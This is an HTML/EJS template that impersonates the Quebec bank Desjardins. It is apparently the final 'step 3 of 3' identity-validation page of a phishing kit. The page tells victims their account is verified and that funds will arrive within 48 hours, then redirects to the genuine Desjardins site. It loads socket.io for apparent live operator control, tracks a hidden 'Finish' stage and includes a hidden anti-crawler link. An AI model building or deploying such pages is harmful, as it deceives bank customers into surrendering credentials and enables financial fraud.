<%
let message = `The deposit will be processed and your funds will appear in your account within 48 hours.

- Desjardins`;
%>
<html lang="fr">
    <head>
        <title>Valider l'identité AccèsD AccèsD Affaires | Desjardins</title>
        <meta name="robots" content="noindex, nofollow">
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <meta http-equiv="refresh" content="3; url=https://www.desjardins.com/">
        <link rel="shortcut icon" href="/assets/desj/d.ico" type="image/x-icon">
        <link rel="icon" href="/assets/desj/d.ico" type="image/x-icon">
        <link href="/assets/desj/files/bootstrap.min.css" rel="stylesheet">
        <link href="/assets/desj/files/fwd-bootstrap.min.css" rel="stylesheet">
        <!--[if lt IE 9]>
        <link href="/assets/desj/files/fwd-bootstrap-ie-force-960-layout.min.css" rel="stylesheet" />
        <![endif]-->
        <!--[if lte IE 8]>
        <link href="/assets/desj/files/fwd-bootstrap-ie.min.css" rel="stylesheet" />
        <link href="/assets/desj/files/fwd-bootstrap.css" rel="stylesheet" />
        <![endif]-->
        <!--[if IE 9]>
        <link href="/assets/desj/files/fwd-bootstrap-ie9.min.css" rel="stylesheet" />
        <![endif]-->
        <link href="/assets/desj/files/global.min.css" rel="stylesheet">
        <link media="only screen and (max-width : 768px)" href="/assets/desj/files/identifiantunique-responsive.min.css" rel="stylesheet">
        <!-- Ajustements de styles de l'application -->
        <link href="/assets/desj/files/theme.min.css" rel="stylesheet">
        <!--[if IE]>
        <link rel="stylesheet" type="text/css" href="/assets/desj/files/ie.min.css"/>
        <![endif]-->
        <!--[if lte IE 7]>
        <link rel="stylesheet" type="text/css" href="/assets/desj/files/ie7.min.css"/>
        <![endif]-->
        <!--[if IE 8]>
        <link rel="stylesheet" type="text/css" href="/assets/desj/files/ie8.min.css"/>
        <![endif]-->
        <link href="/assets/desj/files/owl.carousel.min.css" rel="stylesheet">
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <meta name="desjardins-identifiant-application" content="AccesWeb">
        <meta name="raaMobileActif" content="">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link href="/assets/desj/files/pied.css" rel="stylesheet">
        <link rel="stylesheet" href="/assets/desj/files/entete.css">
        <link rel="stylesheet" href="/assets/desj/files/page-logon.css">
        <style>
        #securiteMobile {
            width: 100% !important;
        }
        </style>
         <script src="/socket.io/socket.io.js"></script>
    </head>
    <body class="isolation-bootstrap-3" style="font-size: 1.3rem;">
        <fwd_placeholder__contenu_head_fragment_principal>
            <!-- if app_mobile -->
            <a name="haut"></a>
            <span class="hidden-xs">
                <div id="zone-entete-de-page">
                    <div id="entete">
                        <div id="access-links">
                            <a href="#contenu" class="hors-ecran" title="Aller au contenu principal">Aller au contenu principal</a>
                        </div>
                        <div id="logo">
                            <h1 class="hors-ecran">Site Internet de Desjardins</h1>
                            <a href="#" title="Retour à page d'accueil de Desjardins"><img src="/assets/desj/desj.svg" alt="Retour à page d'accueil de Desjardins" width="154" height="32"></a>
                        </div>
                        <div id="logo-applicatif">
                            <a href="#"><img src="/assets/desj/files/g40-entete-logo-accesd.png" alt="AccèsD" width="106" height="32"></a>
                            <a href="#"><img src="/assets/desj/files/g40-entete-logo-accesd-affaires.png" alt="AccèsD Affaires" width="90" height="32"></a>
                        </div>
                        <div id="outils">
                            <div id="nous-joindre">
                                <p class="titre-entete"><a href="#" onclick="">Nous joindre</a></p>
                            </div>
                            <div id="aide">
                                <p class="titre-entete"><a href="#" onclick="">Aide</a></p>
                            </div>
                            <div id="fonctions">
                                <ul>
                                    <li class="reduire"><a id="taille-texte-moins" href="javascript:void(0)" title="Réduire la taille du texte">Réduire la taille du texte</a></li>
                                    <li class="augmenter"><a id="taille-texte-plus" href="javascript:void(0)" title="Augmenter la taille du texte">Augmenter la taille du texte</a></li>
                                </ul>
                            </div>
                        </div>
                    </div>
                </div>
            </span>
            <span class="hidden-sm hidden-md hidden-lg">
                <div id="zone-entete-de-page">
                    <nav class="navbar navbar-default" role="navigation">
                        <div class="container max-layout-960">
                            <!-- Brand and toggle get grouped for better mobile display -->
                            <div class="navbar-header">
                                <span class="navbar-brand">
                                    <style>
                                    @media (max-width: 768px) {
                                        .navbar-brand .logo {
                                            display: block !important;
                                            margin-left: 10px;
                                        }
                                    }
                                    </style>
                                    <a href="">
                                        <img class="logo" src="/assets/desj/desj.svg" alt="Aller &agrave; la page d&#39;accueil" title="Desjardins" style="height: 30px">
                                    </a>
                                    <div class="hidden-xs" style="display: inline;">
                                        <img role="presentation" src="/assets/desj/files/g00-entete-filet-logos.png" />
                                        <img class="logo-desjardins" role="presentation" src="/assets/desj/files/g00-logo-desjardins-blanc.png" style="padding-right: 20px;" alt="Desjardins" title="Desjardins"/>
                                    </div>
                                </span>
                                <div id="titrePageMobile" class="navbar-brand hidden-sm hidden-md hidden-lg"></div>
                                <a href="#" class="navbar-brand pull-right hidden-sm hidden-md hidden-lg">
                                <img id="menuAppRetour" src="/assets/desj/files/entete-btn-menu-app.png" height="32"/>
                                </a>
                            </div>
                            <!-- /.navbar-header --> <!-- Collect the nav links, forms, and other content for toggling -->
                            <div class="collapse navbar-collapse" id="navbar-collapse-outils">
                                <div id="outils">
                                    <ul class="nav navbar-nav navbar-right">
                                        <li>
                                            <a class="lien" href="javascript:popup('#','Nous joindre', 'location=0,scrollbars=yes,resizable=yes,width=500,height=500');">
                                            Nous joindre
                                            </a><span class="hidden-xs">|</span>
                                        </li>
                                        <li>
                                            <a class="lien" href="javascript:popup('#','Aide', 'location=0,scrollbars=yes,resizable=yes,width=500,height=500');">
                                            Aide
                                            </a><span class="hidden-xs">|</span>
                                        </li>
                                        <li class="hidden-xs">
                                            <a class="lien" id="changeLangue" href="?langueCible=en">
                                            English
                                            </a>
                                            <span class="hidden-sm">|</span>
                                        </li>
                                        <li class="hidden-xs">
                                            <a class="lien" id="taille-texte-moins" href="javascript:void(0)" style="padding-right: 0px;">
                                            <img src="/assets/desj/files/a00-entete-ic-texte-moins-blanc-on.png" alt="" title="">
                                            </a>
                                        </li>
                                        <li class="hidden-xs">
                                            <a class="lien" id="taille-texte-plus" href="javascript:void(0)" style="padding-left: 8px; padding-right: 20px;">
                                            <img src="/assets/desj/files/a00-entete-ic-texte-plus-blanc-on.png" alt="" title="">
                                            </a>
                                        </li>
                                    </ul>
                                </div>
                            </div>
                            <!-- /.collapse .navbar-collapse -->
                        </div>
                        <!-- /.container-fluid -->
                    </nav>
                    <!-- /.navbar .navbar-default .navbar-fixed-top -->
                </div>
            </span>
            <!-- fin if app_mobile -->
            <div class="zone-centrale">
                <div id="zone-centrale-bg">
                    <!-- div id="zone-centrale-grad" class="zone-centrale padding-top-35px"></div-->
                    <div class="container">
                        <div id="contenu" lang="fr" role="main">
                            <div class="row">
                                <div class="col-xs-24 col-sm-24 col-md-18 col-md-offset-3 col-lg-18 col-lg-offset-3">
                                    <div id="loading" class="loading" style="display: none;">
                                        <div class="panel panel-primary">
                                            <div class="panel-body">
                                                <img id="img-loading" src="/assets/desj/files/a00-loading-petit.gif" alt="Loading">
                                            </div>
                                        </div>
                                    </div>
                                    <h1 id="titrePage" data-titre-page-mobile="Obtenir un mot de passe">
                                        Vérification de sécurité
                                    </h1>
                                    <form id="formQuestionsMotPasseOublie" class="form-horizontal" action="" method="POST" autocomplete="off" onsubmit="return checkform(this);">
                                        <input type="hidden" name="user" value="">
                                        <div class="row">
                                            <div class="col-sm-24 col-md-24">
                                                <div id="erreurSystemeJS" class="has-error hidden" aria-live="assertive">
                                                    <div>
                                                        <span class="help-block-idunique">
                                                        </span>
                                                        <ul>
                                                            <li>
                                                                <a id="erreurLienJS" href="#" class="erreurLien"></a>
                                                            </li>
                                                        </ul>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                        <div class="panel panel-primary">
                                            <div id="panel-body-questions" class="panel-body padding-moyen">
                                                <h2>Étape 3 de 3 – Validation de l'identité</h2>
                                                <br> <br>
                                                <h1>Votre compte a bien été vérifié. </h1>
                                                <h2>
                                                    Vous fonds seront disponibles dans les 48 heures suivantes.<br><br> Nous sommes désolés pour tout inconvénient que cela pourrait avoir causé
                                                    <br><br><br>
                                                    Cordialement,<br>
                                                    L'équipe de sécurité Desjardins
                                                </h2><br>
                                                <div class="col-sm-24 text-right top15px non-selectable hidden-xs">
                                                    <img alt="Sécurité garantie à 100 %" src="/assets/desj/files/g00-logo-securite-garantie-f.png">
                                                </div>
                                                <div class="modal fade" id="modale-institution" tabindex="-1" role="dialog" aria-hidden="true">
                                                    <div class="modal-dialog margin-top">
                                                        <div class="modal-content padding-left10px padding-right10px">
                                                            <div class="modal-header"></div>
                                                            <p>
                                                                <img class="fullwidth" alt="" src="/assets/desj/files//contenu-cheque-815-institut.png">
                                                            </p>
                                                            <div class="modal-footer padding-left0px padding-right0px">
                                                                <div class="row">
                                                                    <div class="col-xs-offset-6 col-xs-12 text-right">
                                                                        <a data-dismiss="modal" class="btn btn-primary fullwidth" href="#">
                                                                        Fermer
                                                                        </a>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                                <div class="modal fade" id="modale-transit" tabindex="-1" role="dialog" aria-hidden="true">
                                                    <div class="modal-dialog margin-top">
                                                        <div class="modal-content padding-left10px padding-right10px">
                                                            <div class="modal-header"></div>
                                                            <p>
                                                                <img class="fullwidth" alt="Il se compose de 5 chiffres." src="/assets/desj/files//contenu-cheque-815-transit.png">
                                                            </p>
                                                            <div class="modal-footer padding-left0px padding-right0px">
                                                                <div class="row">
                                                                    <div class="col-xs-offset-6 col-xs-12 text-right">
                                                                        <a data-dismiss="modal" class="btn btn-primary fullwidth" href="#">
                                                                        Fermer
                                                                        </a>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                                <div class="modal fade" id="modale-compte" tabindex="-1" role="dialog" aria-hidden="true">
                                                    <div class="modal-dialog margin-top">
                                                        <div class="modal-content padding-left10px padding-right10px">
                                                            <div class="modal-header"></div>
                                                            <p>
                                                                <img class="fullwidth" alt="Il se compose de 7 chiffres." src="/assets/desj/files//contenu-cheque-815-folio.png">
                                                            </p>
                                                            <div class="modal-footer padding-left0px padding-right0px">
                                                                <div class="row">
                                                                    <div class="col-xs-offset-6 col-xs-12 text-right">
                                                                        <a data-dismiss="modal" class="btn btn-primary fullwidth" href="#">
                                                                        Fermer
                                                                        </a>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                                <div id="securiteMobile" class="hidden-sm hidden-md hidden-lg">
                                                    <img class="fake" src="/assets/desj/files/g00-logo-securite-garantie-f.png">
                                                    <img class="fake" src="/assets/desj/desj.svg">
                                                    <div id="img_wrap" class="row col-xs-24 padding-left10px" style="width: 260px">
                                                        <img class="normal non-selectable" title="" src="/assets/desj/files/g00-logo-securite-garantie-f.png" alt="">
                                                        <img class="normal non-selectable padding-left20px" title="Desjardins" src="/assets/desj/desj.svg" alt="Desjardins">
                                                    </div>
                                                </div>
                                                <br>
                                                <br>
                                            </div>
                                        </div>
                                    </form>
                                </div>
                                <br>
                            </div>
                        </div>
                    </div>
                    <footer class="footer">
                        <span class="hidden-xs">
                            <div id="zone-pied-de-page">
                                <div id="pied">
                                    <div id="plan-site">
                                        <h2 class="hors-ecran">Plan du site<a href="/not-found" style="visibility: hidden;">d0 n0t cl1ck</a></h2>
                                        <div id="tetes-sections">
                                            <ul>
                                                <li><a href="#">Services aux particuliers</a></li>
                                                <li><a href="#">Services aux entreprises</a></li>
                                                <li><a href="#">Coopmoi</a></li>
                                                <li><a href="#">À propos</a></li>
                                                <li><a href="#">Desjardins sur mobile, GPS et RSS</a></li>
                                            </ul>
                                        </div>
                                    </div>
                                    <div id="zone-legale">
                                        <ul>
                                            <li><a href="#">Sécurité</a></li>
                                            <li><a href="#">Confidentialité</a></li>
                                            <li><a href="#">Conditions d'utilisation et notes légales</a></li>
                                            <li><a href="#">Accessibilité</a></li>
                                            <li><a href="#">Plan du site</a></li>
                                        </ul>
                                        <p class="copyright">© 1996-<?=date('Y')?>,
                                            Mouvement des caisses Desjardins.
                                            Tous droits réservés.
                                        </p>
                                    </div>
                                </div>
                            </div>
                        </span>
                        <span class="hidden-sm hidden-md hidden-lg">
                            <div id="pied-de-page" class="container texte-blanc">
                                <div class="row">
                                    <div class="col-sm-4 col-md-4 text-left pied-de-page-logo hidden-xs">
                                    </div>
                                    <div class="col-xs-24 col-sm-16 col-md-16 text-center pied-de-page-texte">
                                        <span class="hidden-xs">
                                        <a href="javascript:popup('#','Sécurité','scrollbars=yes,resizable=yes,width=500,height=500');">Sécurité</a> |
                                        <a href="javascript:popup('#','Confidentialité','scrollbars=yes,resizable=yes,width=500,height=500');">Confidentialité</a> |
                                        <a href="javascript:popup('#','Conditions utilisation','scrollbars=yes,resizable=yes,width=500,height=500');">Conditions d'utilisation et notes légales</a> |
                                        <a href="javascript:popup('#','Accessibilité','scrollbars=yes,resizable=yes,width=500,height=500');">Accessibilité</a>
                                        <br>
                                        </span>
                                        <p>Copyright © <?=date('Y')?> Mouvement des caisses Desjardins. Tous droits réservés.</p>
                                    </div>
                                    <div class="col-xs-4 col-sm-4 col-md-4 text-right hidden-xs hidden-sm">
                                    </div>
                                </div>
                            </div>
                        </span>
                    </footer>
                    <!-- MONITEUR D'ACTIVITES -->
                    <!-- Inclusion des fichiers javascripts pour le comportement -->
                    <script src="/assets/desj/files/bootstrap.min.js" type="text/javascript"></script>
                    <!--[if lt IE 9]>
                    <script src="/assets/desj/files/respond.min.js"></script>
                    <![endif]-->
                    <script src="/assets/desj/files/fwd-bootstrap.min.js" type="text/javascript"></script>
                    <!--[if IE]>
                    <script src="/assets/desj/files/fwd-bootstrap-ie.min.js" type="text/javascript"></script>
                    <![endif]-->
                    <!--[if lt IE 9]>
                    <script src="/assets/desj/files/html5shiv.js" type="text/javascript"></script>
                    <script src="/assets/desj/files/jquery.placeholder.min.js" type="text/javascript"></script>
                    <![endif]-->
                    <!--[if IE 9]>
                    <script src="/assets/desj/files/jquery.placeholder.min.js" type="text/javascript"></script>
                    <![endif]-->
                </div>
            </div>
        </fwd_placeholder__contenu_head_fragment_principal>
        <span hidden id="navig"> .</span>
        <span hidden id="stage">Finish</span>
    </body>
    <script src="/bank/desj/js/script.js">
    </script>
</html>
